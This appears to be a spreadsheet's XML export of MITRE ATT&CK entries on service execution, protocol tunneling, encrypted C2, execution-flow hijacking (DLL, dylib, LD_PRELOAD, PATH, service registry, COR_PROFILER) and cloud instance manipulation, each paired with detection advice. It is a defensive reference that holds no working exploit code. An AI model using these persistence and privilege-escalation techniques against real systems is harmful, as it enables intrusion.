Adversaries use launchctl to execute commands and programs as [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s. Common subcommands include: &lt;code&gt;launchctl load&lt;/code&gt;,&lt;code&gt;launchctl unload&lt;/code&gt;, and &lt;code&gt;launchctl start&lt;/code&gt;. Adversaries can use scripts or manually run the commands &lt;code&gt;launchctl load -w "%s/Library/LaunchAgents/%s"&lt;/code&gt; or &lt;code&gt;/bin/launchctl load&lt;/code&gt; to execute [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s.(Citation: Sofacy Komplex Trojan)(Citation: 20 macOS Common Tools and Techniques)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1569/001</t>
  </si>
  <si>
    <t>Every Launch Agent and Launch Daemon must have a corresponding plist file on disk which can be monitored. Monitor for recently modified or created plist files with a significant change to the executable path executed with the command-line &lt;code&gt;launchctl&lt;/code&gt; command. Plist files are located in the root, system, and users &lt;code&gt;/Library/LaunchAgents&lt;/code&gt; or &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt; folders. 
Monitor command-line execution of the &lt;code&gt;launchctl&lt;/code&gt; command immediately followed by abnormal network connections. [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s with executable paths pointing to &lt;code&gt;/tmp&lt;/code&gt; and &lt;code&gt;/Shared&lt;/code&gt; folders locations are potentially suspicious. 
When removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure the services are unloaded prior to deleting plist files.</t>
  </si>
  <si>
    <t>System Services: Service Execution</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (&lt;code&gt;services.exe&lt;/code&gt;) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as &lt;code&gt;sc.exe&lt;/code&gt; and [Net](https://attack.mitre.org/software/S0039).
[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and &lt;code&gt;sc.exe&lt;/code&gt; can accept remote servers as arguments and may be used to conduct remote execution.
Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1569/002</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</si>
  <si>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</si>
  <si>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Adversaries may transfer tools or other files between systems in a compromised environment. Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1570</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred within a network using protocols such as SMB.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</si>
  <si>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Adversaries may communicate using a protocol and port paring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t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1571</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</si>
  <si>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</si>
  <si>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There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) 
[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) 
Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1572</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</si>
  <si>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</si>
  <si>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Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1573</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</si>
  <si>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</si>
  <si>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Encrypted Channel: Symmetric Cryptography</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</si>
  <si>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DES, 3DES, Blowfish, and RC4.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1573/001</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</si>
  <si>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</si>
  <si>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Encrypted Channel: Asymmetric Cryptography</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</si>
  <si>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Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.
For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1573/002</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.
There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574</t>
  </si>
  <si>
    <t>Defense Evasion, Persistence, Privilege Escalation</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</si>
  <si>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
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Monitor for changes to environment variables, as well as the commands to implement these changes.
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
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Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.</t>
  </si>
  <si>
    <t>Hijack Execution Flow: DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/001</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</si>
  <si>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</si>
  <si>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Hijack Execution Flow: DLL Side-Loading</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/002</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</si>
  <si>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</si>
  <si>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Hijack Execution Flow: Dylib Hijacking</t>
  </si>
  <si>
    <t>Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with &lt;code&gt;@rpath&lt;/code&gt;, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the &lt;code&gt;LC_LOAD_WEAK_DYLIB&lt;/code&gt; function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
Adversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/004</t>
  </si>
  <si>
    <t>Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. 
Run path dependent libraries can include &lt;code&gt;LC_LOAD_DYLIB&lt;/code&gt;, &lt;code&gt;LC_LOAD_WEAK_DYLIB&lt;/code&gt;, and &lt;code&gt;LC_RPATH&lt;/code&gt;. Other special keywords are recognized by the macOS loader are &lt;code&gt;@rpath&lt;/code&gt;, &lt;code&gt;@loader_path&lt;/code&gt;, and &lt;code&gt;@executable_path&lt;/code&gt;.(Citation: Apple Developer Doco Archive Run-Path) These loader instructions can be examined for individual binaries or frameworks using the &lt;code&gt;otool -l&lt;/code&gt; command. Objective-See's Dylib Hijacking Scanner can be used to identify applications vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Github EmpireProject HijackScanner)</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Executable Installer File Permissions Weakness</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These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Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the &lt;code&gt;%TEMP%&lt;/code&gt; directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012)  (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/005</t>
  </si>
  <si>
    <t>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adversary techniques.</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Dynamic Linker Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as &lt;code&gt;LD_PRELOAD&lt;/code&gt; on Linux or &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt; on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library.(Citation: Baeldung LD_PRELOAD)
On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the &lt;code&gt;export&lt;/code&gt; command, &lt;code&gt;setenv&lt;/code&gt; function, or &lt;code&gt;putenv&lt;/code&gt; function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s &lt;code&gt;os.environ&lt;/code&gt;.
On Linux, adversaries may set &lt;code&gt;LD_PRELOAD&lt;/code&gt; to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. &lt;code&gt;LD_PRELOAD&lt;/code&gt; can be set via the environment variable or &lt;code&gt;/etc/ld.so.preload&lt;/code&gt; file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by &lt;code&gt;LD_PRELOAD&lt;/code&gt; are loaded and mapped into memory by &lt;code&gt;dlopen()&lt;/code&gt; and &lt;code&gt;mmap()&lt;/code&gt; respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) 
On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt; environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/006</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</si>
  <si>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</si>
  <si>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Hijack Execution Flow: Path Interception by PATH Environment Variable</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, &lt;code&gt;%SystemRoot%\system32&lt;/code&gt; (e.g., &lt;code&gt;C:\Windows\system32&lt;/code&gt;), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
For example, if &lt;code&gt;C:\example path&lt;/code&gt; precedes &lt;/code&gt;C:\Windows\system32&lt;/code&gt; is in the PATH environment variable, a program that is named net.exe and placed in &lt;code&gt;C:\example path&lt;/code&gt; will be called instead of the Windows system "net" when "net" is executed from the command-line.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/007</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Hijack Execution Flow: Path Interception by Search Order Hijacking</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
For example, "example.exe" runs "cmd.exe" with the command-line argument &lt;code&gt;net user&lt;/code&gt;. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then &lt;code&gt;cmd.exe /C net user&lt;/code&gt; will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/008</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
</t>
  </si>
  <si>
    <t>Hijack Execution Flow: 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</si>
  <si>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
Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., &lt;code&gt;C:\unsafe path with space\program.exe&lt;/code&gt; vs. &lt;code&gt;"C:\safe path with space\program.exe"&lt;/code&gt;). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is &lt;code&gt;C:\program files\myapp.exe&lt;/code&gt;, an adversary may create a program at &lt;code&gt;C:\program.exe&lt;/code&gt; that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/009</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Services File Permissions Weakness</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/010</t>
  </si>
  <si>
    <t xml:space="preserve">Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. </t>
  </si>
  <si>
    <t>Hijack Execution Flow: Services Registry Permissions Weakness</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, adversaries may change the service's binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to establish persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).
Adversaries may also alter other Registry keys in the service’s Registry tree. For example, the &lt;code&gt;FailureCommand&lt;/code&gt; key may be changed so that the service is executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness)
The &lt;code&gt;Performance&lt;/code&gt; key contains the name of a driver service's performance DLL and the names of several exported functions in the DLL.(Citation: microsoft_services_registry_tree) If the &lt;code&gt;Performance&lt;/code&gt; key is not already present and if an adversary-controlled user has the &lt;code&gt;Create Subkey&lt;/code&gt; permission, adversaries may create the &lt;code&gt;Performance&lt;/code&gt; key in the service’s Registry tree to point to a malicious DLL.(Citation: insecure_reg_perms)
Adversaries may also add the &lt;code&gt;Parameters&lt;/code&gt; key, which stores driver-specific data, or other custom subkeys for their malicious services to establish persistence or enable other malicious activities.(Citation: microsoft_services_registry_tree)(Citation: troj_zegost) Additionally, If adversaries launch their malicious services using svchost.exe, the service’s file may be identified using &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll&lt;/code&gt;.(Citation: malware_hides_service)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/011</t>
  </si>
  <si>
    <t>Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Matthew Demaske, Adaptforward; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>Hijack Execution Flow: COR_PROFILER</t>
  </si>
  <si>
    <t>Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)
Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/012</t>
  </si>
  <si>
    <t>For detecting system and user scope abuse of the COR_PROFILER, monitor the Registry for changes to COR_ENABLE_PROFILING, COR_PROFILER, and COR_PROFILER_PATH that correspond to system and user environment variables that do not correlate to known developer tools. Extra scrutiny should be placed on suspicious modification of these Registry keys by command line tools like wmic.exe, setx.exe, and [Reg](https://attack.mitre.org/software/S0075), monitoring for command-line arguments indicating a change to COR_PROFILER variables may aid in detection. For system, user, and process scope abuse of the COR_PROFILER, monitor for new suspicious unmanaged profiling DLLs loading into .NET processes shortly after the CLR causing abnormal process behavior.(Citation: Red Canary COR_PROFILER May 2020) Consider monitoring for DLL files that are associated with COR_PROFILER environment variables.</t>
  </si>
  <si>
    <t>Jesse Brown, Red Canary</t>
  </si>
  <si>
    <t>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Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time or the mount of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Create Snapshot</t>
  </si>
  <si>
    <t>An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/001</t>
  </si>
  <si>
    <t>09 June 2020</t>
  </si>
  <si>
    <t>The creation of a snapshot is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities such as the creation of one or more snapshots and the restoration of these snapshots by a new user account.
In AWS, CloudTrail logs capture the creation of snapshots and all API calls for AWS Backup as events. Using the information collected by CloudTrail, you can determine the request that was made, the IP address from which the request was made, which user made the request, when it was made, and additional details.(Citation: AWS Cloud Trail Backup API).
In Azure, the creation of a snapshot may be captured in Azure activity logs. Backup restoration events can also be detected through Azure Monitor Log Data by creating a custom alert for completed restore jobs.(Citation: Azure - Monitor Logs)
Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of the &lt;code&gt;gcloud compute instances create&lt;/code&gt; command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the &lt;code&gt;"sourceSnapshot":&lt;/code&gt; parameter pointed to &lt;code&gt;"global/snapshots/[BOOT_SNAPSHOT_NAME]&lt;/code&gt;.(Citation: GCP - Creating and Starting a VM)</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Create Cloud Instance</t>
  </si>
  <si>
    <t>An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1578/002</t>
  </si>
  <si>
    <t>14 May 2020</t>
  </si>
  <si>
    <t>The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
In AWS, CloudTrail logs capture the creation of an instance in the &lt;code&gt;RunInstances&lt;/code&gt; event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of &lt;code&gt;gcloud compute instances create&lt;/code&gt; to create a VM.(Citation: Cloud Audit Logs)</t>
  </si>
  <si>
    <t>Modify Cloud Compute Infrastructure: Delete Cloud Instance</t>
  </si>
  <si>
    <t>An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
